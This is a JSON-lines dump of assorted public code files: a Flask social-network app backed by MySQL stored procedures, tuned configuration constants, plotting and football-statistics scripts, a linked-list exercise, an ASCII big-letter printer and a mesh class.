conn.close()\n\n\n@app.route('/signIn', methods=['GET'])\ndef show_sign_in():\n return render_template('sign-in.html')\n\n\n@app.route('/signIn', methods=['POST'])\ndef sign_in():\n try:\n _username = request.form['inputEmail']\n _password = request.form['inputPassword']\n\n con = mysql.connect()\n cursor = con.cursor()\n cursor.callproc('sp_validateLogin', (_username,))\n data = cursor.fetchall()\n\n if len(data) > 0:\n if check_password_hash(str(data[0][3]), _password):\n session['user'] = data[0][0]\n return json.dumps({'redirect': url_for('user_home')})\n else:\n return json.dumps({'message': 'Wrong Email address or Password.'}), 401\n else:\n return json.dumps({'message': 'Wrong Email address or Password.'}), 401\n\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n con.close()\n\n\n@app.route('/userHome')\ndef user_home():\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getPostsOfConnectedUsers', (session.get('user'), 50))\n posts = cursor.fetchall()\n\n post_list = []\n\n for post in posts:\n post_dict = {\n 'pid': post[0],\n 'timestamp': post[1],\n 'author': post[2],\n 'body': post[3],\n 'tags': post[4].split(',') if post[4] is not None else [],\n 'favorites': post[5]\n }\n post_list.append(post_dict)\n return render_template('user-home.html', posts=post_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/find-friends')\ndef find_friends():\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getNonFriends', (session.get('user'),))\n people = cursor.fetchall()\n\n people_list = []\n\n for person in people:\n person_dict = {\n 'id': person[0],\n 'name': person[1],\n 'email': person[2]\n }\n people_list.append(person_dict)\n\n return render_template('friends.html', people_list=people_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/friends/<pid>', methods=['POST'])\ndef add_friend(pid):\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_connectUsers', (session.get('user'), pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/post', methods=['POST'])\ndef post():\n if session.get('user'):\n try:\n _user = session.get('user')\n _post = request.form['post']\n _tags = request.form.getlist('tags')\n _pid = 0\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_newPost', (_user, _post, _pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n\n cursor.close()\n\n cursor = conn.cursor()\n cursor.execute('SELECT @_sp_newPost_2')\n\n outParam = cursor.fetchall()\n cursor.close()\n\n if len(outParam) > 0:\n _id = outParam[0][0]\n cursor = conn.cursor()\n for _tag in _tags:\n cursor.callproc('sp_createPostTopic', (_id, _tag))\n data = cursor.fetchall()\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n except Exception as e:\n return json.dumps({'redirect': url_for('error')}), 500\n finally:\n cursor.close()\n conn.close()\n\n\n@app.route('/favorite/<pid>', methods=['POST'])\ndef favorite(pid):\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_createFavorite', 
(session.get('user'), pid))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return json.dumps({'response': 'success'})\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/posts/<pid>')\ndef posts(pid):\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getPostComments', (pid,))\n comments = cursor.fetchall()\n\n comments_list = []\n\n for comment in comments:\n comment_dict = {\n 'pid': comment[0],\n 'body': comment[1],\n 'timestamp': comment[2],\n 'author': comment[3],\n }\n comments_list.append(comment_dict)\n\n cursor.close()\n\n cursor = conn.cursor()\n cursor.callproc('sp_getPost', (pid,))\n post = cursor.fetchall()\n\n post_dict = {\n 'pid': post[0][0],\n 'timestamp': post[0][1],\n 'author': post[0][2],\n 'body': post[0][3],\n 'tags': post[0][4].split(',') if post[0][4] is not None else [],\n 'favorites': post[0][5]\n }\n \n return render_template('post.html', post=post_dict, comments=comments_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/posts/<pid>/comments', methods=['POST'])\ndef comment(pid):\n if session.get('user'):\n _post = request.form['post']\n bod_out = ''\n stamp = datetime.now()\n author = ''\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_newComment', (pid, session.get('user'), _post, bod_out, stamp, author))\n comment = cursor.fetchall()\n\n if len(comment) is 0:\n conn.commit()\n\n cursor.close()\n cursor = conn.cursor()\n cursor.execute('SELECT @_sp_newComment_3')\n body = cursor.fetchall()\n\n cursor.execute('SELECT @_sp_newComment_4')\n timestamp = cursor.fetchall()\n\n cursor.execute('SELECT @_sp_newComment_5')\n author = cursor.fetchall()\n\n cursor.close()\n\n comment = {\n 'body': body[0][0],\n 'timestamp': datetime.strptime(timestamp[0][0], \"%Y-%m-%d %H:%M:%S\"),\n 'author': author[0][0]\n }\n\n return render_template('comment.html', comment=comment)\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/messages')\ndef messages():\n if session.get('user'):\n return render_template('messages.html')\n\n\n@app.route('/messages/<user_id>', methods=['GET'])\ndef view_messages(user_id):\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getMessagesForUser', (session.get('user'), user_id))\n messages = cursor.fetchall()\n messages_list = []\n\n for message in messages:\n message_dict = {\n 'mid': message[0],\n 'fromuser': message[1],\n 'body': message[2],\n 'timestamp': message[3],\n 'touser': message[4],\n }\n messages_list.append(message_dict)\n\n cursor.close()\n cursor = conn.cursor()\n cursor.callproc('sp_getUserName', (user_id,))\n\n other_user = cursor.fetchall()\n\n return render_template('message-list.html', messages_list=messages_list,\n user_id=session.get('user'),\n other_user=other_user[0][0],\n other_user_id=user_id)\n\n\n@app.route('/messages/<user_id>', methods=['POST'])\ndef send_message(user_id):\n if session.get('user'):\n _message = request.form['message']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_createMessage', (session.get('user'), user_id, _message))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n return render_template('message.html', message=_message)\n\n else:\n return json.dumps({'response': 'error'}), 400\n\n\n@app.route('/friends')\ndef friends():\n if session.get('user'):\n conn = mysql.connect()\n cursor = conn.cursor()\n\n 
cursor.callproc('sp_getFriends', (session.get('user'),))\n friends = cursor.fetchall()\n\n friend_list = []\n\n for friend in friends:\n friend_dict = {\n 'id': friend[0],\n 'name': friend[1]\n }\n friend_list.append(friend_dict)\n\n return json.dumps(friend_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n@app.route('/logout')\ndef logout():\n session.pop('user', None)\n return redirect('/')\n\n\n@app.route('/error')\ndef error():\n return render_template('error', error='Sorry there was a problem with your request.')\n\n\n@app.route('/tags')\ndef tags():\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM topics\")\n tags = cursor.fetchall()\n tags = [element for tupl in tags for element in tupl]\n return json.dumps(tags)\n\n\n@app.route('/my-posts')\ndef my_posts():\n if session.get('user'):\n\n conn = mysql.connect()\n cursor = conn.cursor()\n\n cursor.callproc('sp_getMyPosts', (session.get('user'),))\n posts = cursor.fetchall()\n\n post_list = []\n\n for post in posts:\n post_dict = {\n 'pid': post[0],\n 'timestamp': post[1],\n 'author': post[2],\n 'body': post[3],\n 'tags': post[4].split(',') if post[4] is not None else [],\n 'favorites': post[5]\n }\n post_list.append(post_dict)\n return render_template('my-posts.html', posts=post_list)\n else:\n return render_template('sign-in.html', error='Unauthorized Access')\n\n\n@app.route('/posts/<post_id>', methods=['PUT'])\ndef update_post(post_id):\n _user = session.get('user')\n _post = request.form['post']\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_updatePost', (post_id, _post, _user))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n cursor.close()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n\n\n@app.route('/posts/<post_id>', methods=['DELETE'])\ndef delete_post(post_id):\n _user = session.get('user')\n\n conn = mysql.connect()\n cursor = conn.cursor()\n cursor.callproc('sp_deletePost', (post_id, _user))\n data = cursor.fetchall()\n\n if len(data) is 0:\n conn.commit()\n cursor.close()\n return json.dumps({'response': 'success'})\n else:\n return json.dumps({'error': str(data[0])}), 400\n\n\n@app.template_filter('date')\ndef date_filter(_date):\n if _date > datetime.now() - timedelta(seconds=60):\n return 'a few seconds ago'\n elif _date > datetime.now() - timedelta(minutes=15):\n return 'a few minutes ago'\n elif _date > datetime.combine(date.today(), time.min):\n return 'today'\n elif _date > datetime.combine(date.today(), time.min) - timedelta(days=1):\n return 'yesterday'\n else:\n return _date.strftime('%a %b %e %y')\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"kalpert/DBDesign","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":13766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"32427898466","text":"GLOBAL_CONFIG_FILE = \"/etc/tuned/tuned-main.conf\"\nACTIVE_PROFILE_FILE = \"/etc/tuned/active_profile\"\nAUTODETECT_FILE = \"recommend.conf\"\nDAEMONIZE_PARENT_TIMEOUT = 5\nDBUS_BUS = \"com.redhat.tuned\"\nDBUS_INTERFACE = \"com.redhat.tuned.control\"\nDBUS_OBJECT = \"/Tuned\"\nDEFAULT_PROFILE = \"balanced\"\nDEFAULT_STORAGE_FILE = \"/run/tuned/save.pickle\"\nLOAD_DIRECTORIES = [\"/usr/lib/tuned\", \"/etc/tuned\"]\nPLUGINS_STORE = [\"/usr/lib/python*/site-packages/tuned/plugins/\"]\nCONF_PROFILE_FILE = \"/tuned.conf\"\n# number of backups\nLOG_FILE_COUNT 
= 2\nLOG_FILE_MAXBYTES = 100*1000\nLOG_FILE = \"/var/log/tuned/tuned.log\"\nPID_FILE = \"/run/tuned/tuned.pid\"\nSYSTEM_RELEASE_FILE = \"/etc/system-release-cpe\"\nPREFIX_FACTORY = \"Factory\"\nPREFIX_USER = \"User\"\n\n# default configuration\nCFG_DEF_DYNAMIC_TUNING = True\n# how long to sleep before checking for events (in seconds)\nCFG_DEF_SLEEP_INTERVAL = 1\n# update interval for dynamic tuning (in seconds)\nCFG_DEF_UPDATE_INTERVAL = 10\n","repo_name":"mstana/tuned","sub_path":"tuned/consts.py","file_name":"consts.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4225209389","text":"import jsonpickle\n\nclass Cat:\n\tdef __init__(self, name, breed):\n\t\tself.name = name\n\t\tself.breed = breed\n\tc = Cat('Charles', 'Toby')\n\n\t#j = json.dump(c.__dict__)\n\nwith open('cat.json', 'w') as file:\n\tfrozen = jsonpickle.encode(c) #creates file and adds in \n\tfile.write(frozen)\n","repo_name":"Princivil/Software-Dev","sub_path":"Python/Practice/json_demo.py","file_name":"json_demo.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"73285216904","text":"import matplotlib.pyplot as plt\nimport hippoFileUtils as hfu\n\n\ntime_vj_5000 = hfu.readTrainingData('20171025_vj_5000_19_train.txt')\nfor i in range(1, len(time_vj_5000)):\n\ttime_vj_5000[i] += time_vj_5000[i-1]\n\ntime_gauss = hfu.readTrainingData('20180125_fuzzy_gauss2_train.txt')\ntime_gauss[0] /= 1000\nfor i in range(1, len(time_gauss)):\n\ttime_gauss[i] /= 1000\n\ttime_gauss[i] += time_gauss[i-1]\n\ntime_tri = hfu.readTrainingData('20180118_fuzzy_tri_std3_19_train.txt')\nfor i in range(1, len(time_tri)):\n\ttime_tri[i] += time_tri[i-1]\n\nerr_vj_5000 = hfu.readErr('20171025_vj_5000_19_test.txt')\nerr_gauss = hfu.readErr('20180125_fuzzy_gauss2_test.txt')\nerr_tri = hfu.readErr('20180118_fuzzy_tri_std3_19_test.txt')\n\nerr_vj_5000 = [100*x for x in err_vj_5000]\nerr_gauss = [100*x for x in err_gauss]\nerr_tri = [100*x for x in err_tri]\n\nplt.figure(1)\nplt.subplot(111)\nplt.plot(time_vj_5000, err_vj_5000, 'k:', linewidth = 1.5, label = 'Viola-Jones with K\\' = 5000')\nplt.plot(time_tri, err_tri, 'b--', linewidth = 1.5, label = r'Triangular MF - $\\gamma = 3$')\nplt.plot(time_gauss, err_gauss, 'm-', linewidth = 1.5, label = r'Improved Gaussian MF $\\gamma = 2$')\nplt.title('Error vs. 
Training time by MIT cbcl dataset')\nplt.xlim(0, 3500)\nplt.xlabel('Training time (second)')\nplt.ylabel('Error (%)')\nplt.legend()\n#plt.show()\n\nplt.savefig('20180124_all_err_19.png')","repo_name":"danhdoan/AdaBoost-with-Fuzzy-MF","sub_path":"plotFigures/err_19/plotError.py","file_name":"plotError.py","file_ext":"py","file_size_in_byte":1350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"7826134934","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n \n def reverseList(self, head):\n prev = None\n curr = head\n \n while curr:\n next = curr.next\n curr.next = prev\n prev = curr\n curr = next\n \n return prev\n\n def isPalindrome(self, head: Optional[ListNode]) -> bool:\n slow, fast = head, head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n \n reversed_head = self.reverseList(slow)\n\n while head and reversed_head:\n if head.val != reversed_head.val:\n return False\n head = head.next\n reversed_head = reversed_head.next\n return True\n \n","repo_name":"johnteye/A2SV--Onboarding-Phase","sub_path":"PalindromeLinkedList.py","file_name":"PalindromeLinkedList.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"41996618518","text":"\"\"\"Utilities for generating new columns for football predictions.\"\"\"\n\nfrom numpy import log2\nimport pandas as pd\n\n\ndef get_teams_in_frame(frame):\n \"\"\"Return a Series of names of teams in the frame.\"\"\"\n return frame[\"home\"].unique()\n\n\n# Helper functions for extracting a team's games for a season\n\n\ndef games_with_team(name, frame):\n \"\"\"Return a Frame of games including named team.\"\"\"\n return frame[(frame[\"home\"] == name) | (frame[\"visitor\"] == name)]\n\n\ndef games_in_season(season, frame, before=None, tier=None):\n \"\"\"\n Return a Frame including games from the specified season.\n\n Optional filtering by date (before) and tier (tier).\n \"\"\"\n season = frame[frame[\"Season\"] == season]\n if before is not None:\n season = season[season[\"Date\"] < before]\n if tier is not None:\n season = season[season[\"tier\"] == tier]\n return season\n\n\ndef get_history_frame(team, season, frame, before=None):\n \"\"\"Return Frame containing specified team's games from season.\"\"\"\n with_team = games_with_team(team, frame)\n in_season = games_in_season(season, with_team, before=before)\n return in_season\n\n\n# Add columns for a teams results so far\n\nhome_result = {\"H\": \"W\", \"D\": \"D\", \"A\": \"L\"}\naway_result = {\"H\": \"L\", \"D\": \"D\", \"A\": \"W\"}\nresult_to_points_pre_1981 = {\"W\": 2, \"D\": 1, \"L\": 0}\nresult_to_points = {\"W\": 3, \"D\": 1, \"L\": 0}\n\n\ndef create_history_series(season):\n \"\"\"Return home and away history series for given season.\"\"\"\n home_histories = []\n away_histories = []\n for team in get_teams_in_frame(season):\n # Extract home and away matches for team\n home_results = season[season[\"home\"] == team].copy()\n away_results = season[season[\"visitor\"] == team].copy()\n\n # Translate A/D/H results into L/D/W for home and W/D/L for away\n home_results[\"team_result\"] = home_results[\"result\"].map(home_result)\n away_results[\"team_result\"] = away_results[\"result\"].map(away_result)\n\n # Put the season's matches back together\n team_results = pd.concat([home_results, 
away_results]).sort_index()\n\n # Get cumulative results so far (removing current match)\n team_results[\"form\"] = team_results[\"team_result\"].cumsum().str[:-1]\n team_results[\"points\"] = (\n team_results[\"team_result\"]\n .map(result_to_points)\n .shift(fill_value=0)\n .cumsum()\n )\n\n # Re-extract home and away series\n home_bool = team_results[\"home\"] == team\n home_history = team_results[home_bool][[\"form\", \"points\"]]\n away_history = team_results[~home_bool][[\"form\", \"points\"]]\n\n # Add this team's form to the list of home/away forms\n home_histories.append(home_history)\n away_histories.append(away_history)\n\n # Turn the lists of forms into pandas series and then return the pair\n all_home = pd.concat(home_histories)\n all_away = pd.concat(away_histories)\n return all_home, all_away\n\n\ndef game_to_result(game, team):\n \"\"\"\n Translate a game into a result for the specified team.\n\n Result given in the form of W/L/D.\n \"\"\"\n if game[\"home\"] == team:\n return home_result[game[\"result\"]]\n else:\n return away_result[game[\"result\"]]\n\n\ndef get_history_string(team, season, frame, before=None):\n \"\"\"Get a string representing the historical performance of the team in the season to date.\"\"\"\n hist_frame = get_history_frame(team, season, frame, before)\n result_series = hist_frame.apply(lambda x: game_to_result(x, team), axis=1)\n return \"\".join(result_series.values.tolist())\n\n\npoints_dict = {\"W\": 3, \"D\": 1, \"L\": 0}\n\n\n# This is a pretty weird way to do things.\n# I think I should revisit this whole approach.\n\n\ndef points_from_history(s):\n \"\"\"Translate a history string into a number of points.\"\"\"\n return sum([points_dict[x] for x in s])\n\n\n# Also useful, as a comparison, the final record of results and points for a season\n\n\ndef get_full_season(team, season, frame):\n \"\"\"Get full season as a string.\"\"\"\n hf = get_history_frame(team, season, frame)\n return hf.values.tolist()[-1][\"home_history\"]\n\n\ndef score_log(prediction, result):\n \"\"\"Return log score of predictions given results.\"\"\"\n return log2((prediction * result).sum(axis=1))\n\n\ndef score_brier(prediction, result):\n \"\"\"Return Brier score of prediction given results.\"\"\"\n return ((result - prediction) ** 2).sum(axis=1)\n\n\ndef gen_score_list(prediction, result, title, printout=True):\n \"\"\"Create score list for the score frame.\"\"\"\n ret = [\n title,\n score_log(prediction, result).mean(),\n score_brier(prediction, result).mean(),\n ]\n if printout:\n print_score_list(ret)\n return ret\n\n\ndef print_score_list(in_list):\n \"\"\"Print score list.\"\"\"\n print(f\"{in_list[0]} mean scores:\")\n print(f\" Log score: {in_list[1]}\")\n print(f\" Brier score: {in_list[2]}\")\n\n\ndef print_scores(prediction, result, title):\n \"\"\"Print scores of predictions given results.\"\"\"\n print_score_list(gen_score_list(prediction, result, title))\n\n\ndef normalise_column(series):\n \"\"\"Return min/max normalisation of a column.\"\"\"\n return (series - series.min()) / (series.max() - series.min())\n\n\ndef prob_frame_to_prediction(game_frame, col_name, prob_frame):\n \"\"\"\n Return a prediction frame based on the input game frame and prob frame.\n\n The col_name must be a data column whose entries match\n the keys to the prob_frame.\n \"\"\"\n w = game_frame[col_name].map(prob_frame[\"home_win\"])\n d = game_frame[col_name].map(prob_frame[\"draw\"])\n l = game_frame[col_name].map(prob_frame[\"home_loss\"])\n prediction = pd.concat(\n 
[w.rename(\"home_win\"), d.rename(\"draw\"), l.rename(\"home_loss\")],\n axis=1,\n )\n return prediction\n\n\ndef create_form_scores(train_frame, test_frame, length):\n \"\"\"\n Create lists of scores for home, away and unknown form of length length.\n\n Function does not check whether shorter game histories have been removed.\n \"\"\"\n print(\"Generating form prediction scores for length \" + str(length))\n # Copy the dataframe and generate form columns of the right length.\n\n values = [\"home_loss\", \"draw\", \"home_win\"]\n base_home_history = \"home_history\"\n base_away_history = \"away_history\"\n train = train_frame.copy()\n test = test_frame.copy()\n for frame in [test, train]:\n frame[\"form_home\"] = frame[base_home_history].str[-length:]\n frame[\"form_away\"] = frame[base_away_history].str[-length:]\n\n form_vc = train[\"form_home\"].value_counts()\n print(\n f\"Minimum value count {form_vc.min()}, length {len(form_vc)} out of {3**length}\"\n )\n\n # Generate home and away form probabilities\n # Use the fact that pivot table defaults to mean, to extract win/lose/draw\n # probabilities for each game history.\n\n probs_frame_home = train.pivot_table(index=\"form_home\", values=values)\n\n probs_frame_away = train.pivot_table(index=\"form_away\", values=values)\n\n # Generate unknown form probabilities\n home_counts = train[\"form_home\"].value_counts()\n away_counts = train[\"form_away\"].value_counts()\n\n weights = home_counts / (home_counts + away_counts)\n\n probs_frame_unknown = probs_frame_home.mul(weights, axis=0) + probs_frame_away.mul(\n 1 - weights, axis=0\n )\n\n # Generate predictions\n form_home_prediction = prob_frame_to_prediction(test, \"form_home\", probs_frame_home)\n\n form_away_prediction = prob_frame_to_prediction(test, \"form_away\", probs_frame_away)\n\n form_unknown_prediction = prob_frame_to_prediction(\n test, \"form_home\", probs_frame_unknown\n )\n\n # Extract results:\n results_bools = test[values]\n\n # Score predictions\n form_home_score = gen_score_list(\n form_home_prediction, results_bools, f\"Form ({length}, home)\", printout=False\n )\n\n form_away_score = gen_score_list(\n form_away_prediction, results_bools, f\"Form ({length}, away)\", printout=False\n )\n\n form_unknown_score = gen_score_list(\n form_unknown_prediction,\n results_bools,\n f\"Form ({length}, unknown)\",\n printout=False,\n )\n\n return [form_home_score, form_away_score, form_unknown_score]\n\n\ndef create_both_form_scores(train_frame, test_frame, length):\n \"\"\"\n Create score_list using predictions from both teams.\n\n Even with the full dataframe, this will only really work up to\n length=3.\n \"\"\"\n print(\"Generating form prediction scores for length \" + str(length))\n # Copy the dataframe and generate form columns of the right length.\n values = [\"home_loss\", \"draw\", \"home_win\"]\n base_home_history = \"home_history\"\n base_away_history = \"away_history\"\n df_train = train_frame.copy()\n df_test = test_frame.copy()\n\n for frame in [df_train, df_test]:\n frame[\"both_form\"] = (\n frame[base_home_history].str[-length:]\n + frame[base_away_history].str[-length:]\n )\n form_vc = df_train[\"both_form\"].value_counts()\n print(\n f\"Minimum value count {form_vc.min()}, length {len(form_vc)} out of {3**(length*2)}\"\n )\n\n # Extract results:\n results_bools = df_test[values]\n\n # Generate probabilities\n both_form_probs = df_train.pivot_table(index=\"both_form\", values=values)\n # Generate predictions\n both_form_prediction = prob_frame_to_prediction(\n 
df_test, \"both_form\", both_form_probs\n )\n\n return gen_score_list(\n both_form_prediction, results_bools, f\"Both form ({length})\", printout=False\n )\n","repo_name":"scmbradley/football-stats","sub_path":"utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":9545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"13596868020","text":"\"\"\"Replace input with self-made big letters.\"\"\"\r\n\r\nbig_letters = {\r\n \"let_a\": [\" ,===, \", \"|| ||\", \"||===||\", \"|| ||\", \"!! !!\"],\r\n \"let_b\": [\", ===, \", \"|| ||\", \"||===' \", \"|| ||\", \"''===' \"],\r\n \"let_c\": [\" ,===,\", \"|| \", \"|| \", \"|| \", \"''==='\"],\r\n \"let_d\": [\",====, \", \"|| ||\", \"|| ||\", \"|| ||\", \"'====' \"],\r\n \"let_e\": [\",=====,\", \"|| \", \"||=== \", \"|| \", \"'====='\"],\r\n \"let_f\": [\",=====,\", \"|| \", \"||=== \", \"|| \", \"!! \"],\r\n \"let_g\": [\" ,===, \", \"|| '\", \"|| ,,,\", \"|| ||\", \" '===' \"],\r\n \"let_h\": [\",, ,,\", \"|| ||\", \"||===||\", \"|| ||\", \"!! !!\"],\r\n \"let_i\": [\",,\", \"||\", \"||\", \"||\", \"!!\"],\r\n \"let_j\": [\" ,,\", \" ||\", \" ||\", \" ||\", \"'==''\"],\r\n \"let_k\": [\",, ,,\", \"|| // \", \"||<( \", \"|| \\\\\\\\ \", \"!! \\\\\\\\\"],\r\n \"let_l\": [\",, \", \"|| \", \"|| \", \"|| \", \"'===='\"],\r\n \"let_m\": [\",, ,,\", \"||\\\\ /||\", \"||\\\\\\\\//||\", \"|| '' ||\", \"!! !!\"],\r\n \"let_n\": [\",,, ,,\", \"||\\\\ ||\", \"||\\\\\\\\ ||\", \"|| \\\\\\\\||\", \"!! '!!\"],\r\n \"let_o\": [\" ,===, \", \"|| ||\", \"|| ||\", \"|| ||\", \" '===' \"],\r\n \"let_p\": [\", ===, \", \"|| ||\", \"||===' \", \"|| \", \"!! \"],\r\n \"let_q\": [\" ,===, \", \"|| || \", \"|| || \", \"|| || \", \" '==='==\"],\r\n \"let_r\": [\", ===, \", \"|| ||\", \"||===.'\", \"|| || \", \"!! !!\"],\r\n \"let_s\": [\" ,====,\", \"|| \", \" '===, \", \" ||\", \"'====' \"],\r\n \"let_t\": [\"==,==,==\", \" || \", \" || \", \" || \", \" !! \"],\r\n \"let_u\": [\",, ,,\", \"|| ||\", \"|| ||\", \"|| ||\", \" '===' \"],\r\n \"let_v\": [\",, ,,\", \"\\\\\\\\ //\", \" \\\\\\\\ // \", \" \\\\!/ \", \" v \"],\r\n \"let_w\": [\",, ,,\", \"|| ||\", \"|| ||\", \"|| || ||\", \" '=''=' \"],\r\n \"let_x\": [\",, ,,\", \" \\\\\\\\ // \", \" :x: \", \" // \\\\\\\\ \", \"!! !!\"],\r\n \"let_y\": [\",, ,,\", \" \\\\\\\\ // \", \" \\\\\\\\// \", \" || \", \" !! \"],\r\n \"let_z\": [\",====,\", \" // \", \" // \", \" // \", \"'===='\"],\r\n \"let_ \": [\" \", \" \", \" \", \" \", \" \"],\r\n \"let_-\": [\" \", \" \", \"===\", \" \", \" \"],\r\n \"let_~\": [\"| |\", \" | | \", \" | \", \" | | \", \"| |\"],\r\n}\r\n\r\n\r\ndef capitalize(sentence, line_length):\r\n \"\"\"Capitalize the input.\"\"\"\r\n part_list = split_sentence(sentence, line_length)\r\n for part in part_list:\r\n # for every part of the sentence,\r\n for num in range(5):\r\n # 5 times,\r\n print(\" \")\r\n # with newlines in between,\r\n for char in part:\r\n # for every character in the part,\r\n try:\r\n print(big_letters[\"let_\" + char.lower()][num], end=' ')\r\n # print, from the dictionary big_letters, the xth item\r\n # (num) of corresponding list; end with space instead\r\n # of a new line\r\n except KeyError:\r\n print(big_letters[\"let_~\"][num], end=' ')\r\n # but if no corresponding key is found for character,\r\n # print 'let_!' 
from the dictionary, which is a big X\r\n\r\n\r\ndef split_sentence(sentence, line_length):\r\n \"\"\"Split the sentence into parts to print out.\"\"\"\r\n word_list = sentence.split()\r\n part_list = []\r\n current_part = \"\"\r\n for word in word_list: # for every word in the word list,\r\n if len(current_part + word) <= int(line_length):\r\n # if length of current part + current word is less than allowed:\r\n current_part += word + \" \" # add word and space to current_part\r\n elif len(word) > int(line_length):\r\n # else, if word length is longer than allowed:\r\n part_list.append(current_part[:-1])\r\n current_part = \"\"\r\n # add current_part to word_list (except last character, which\r\n # is a space) and make current_part an empty string\r\n for char in range(0, len(word), int(line_length)):\r\n # then, for every xth character in the word, starting at the\r\n # first character:\r\n current_part += word[char:char + int(line_length)]\r\n # make a slice, starting at current character, and ending\r\n # before the xth character, and put it in current_part\r\n if len(current_part) == int(line_length):\r\n # if length of current_part is same as allowed length:\r\n part_list.append(current_part)\r\n # put current_part in part_list\r\n current_part = \"\"\r\n else:\r\n current_part += \" \"\r\n else:\r\n # but if length of current part + current word is longer than\r\n # allowed, and word length is shorter than allowed:\r\n part_list.append(current_part[:-1])\r\n current_part = \"\"\r\n current_part += word + \" \"\r\n # put current_part (except last character, which is a space),\r\n # in part_list, make current_part empty, and put word in\r\n # current_part\r\n part_list.append(current_part[:-1])\r\n return part_list\r\n\r\n\r\ndef update_history(history_list, sentence):\r\n \"\"\"Update the history list.\"\"\"\r\n history_list.append(sentence)\r\n if len(history_list) > 10:\r\n del history_list[0]\r\n\r\n\r\ndef run_program():\r\n \"\"\"Run the program.\"\"\"\r\n history_list = []\r\n while True:\r\n history_or_new = input(\"Would you like to write a new sentence (a), \"\r\n \"or pick a previous sentence from the history \"\r\n \"(b)? a/b: \")\r\n if history_or_new == \"b\":\r\n if history_list == []:\r\n print(\"History is currently empty! \")\r\n sentence = input(\"Type a sentence: \")\r\n update_history(history_list, sentence)\r\n else:\r\n for index, item in enumerate(history_list, start=1):\r\n print(str(index) + \". \" + item)\r\n choice = input(\"Choose a sentence: \")\r\n sentence = history_list[int(choice) - 1]\r\n else:\r\n sentence = input(\"Type a sentence: \")\r\n update_history(history_list, sentence)\r\n line_length = input(\"What is the max number of characters per line? \")\r\n capitalize(sentence, line_length)\r\n run_again = input(\"\\n\\nWould you like to run this program again? 
y/n: \")\r\n if run_again == \"y\":\r\n continue\r\n else:\r\n print(\"\\nThank you for using this program!\")\r\n break\r\n\r\n\r\nrun_program()\r\n","repo_name":"irene9508/big_letters","sub_path":"big_letters.py","file_name":"big_letters.py","file_ext":"py","file_size_in_byte":6499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"40407304648","text":"# mesh class should only hold meta data\nimport Fields\nimport MeshConfig\n\n\nclass cartesian2D():\n\n def __init__(self, len_x, len_y, res):\n ### a regular, rectangular mesh with nb of cells in [x,y] direction, according to dimensions parameter\n\n self.lenX = len_x\n self.lenY = len_y\n self.uniformSpacing = 1.0/res # this is a scalar, which is only valid for regular cartesian meshes. reciprocal distances could be a member of every mesh\n self.cells_x = int(res*self.lenX)\n self.cells_y = int(res*self.lenY)\n self.nbCells = self.cells_x*self.cells_y\n\n MeshConfig.SHAPE_SCALAR_CV = (self.cells_y, self.cells_x)\n# MeshConfig.SHAPE_SCALAR_CV_GHOST = (self.cells_y+2, self.cells_x+2)\n MeshConfig.SHAPE_FACES_U = (self.cells_y , self.cells_x + 1)\n MeshConfig.SHAPE_FACES_V = (self.cells_y + 1, self.cells_x)\n MeshConfig.SHAPE_VERTEX = (self.cells_y + 1, self.cells_x + 1)\n\n\n def calcInvCellDistance(self,direction):\n rDist = 1.0/self.uniformSpacing\n if direction == 'east' or direction == 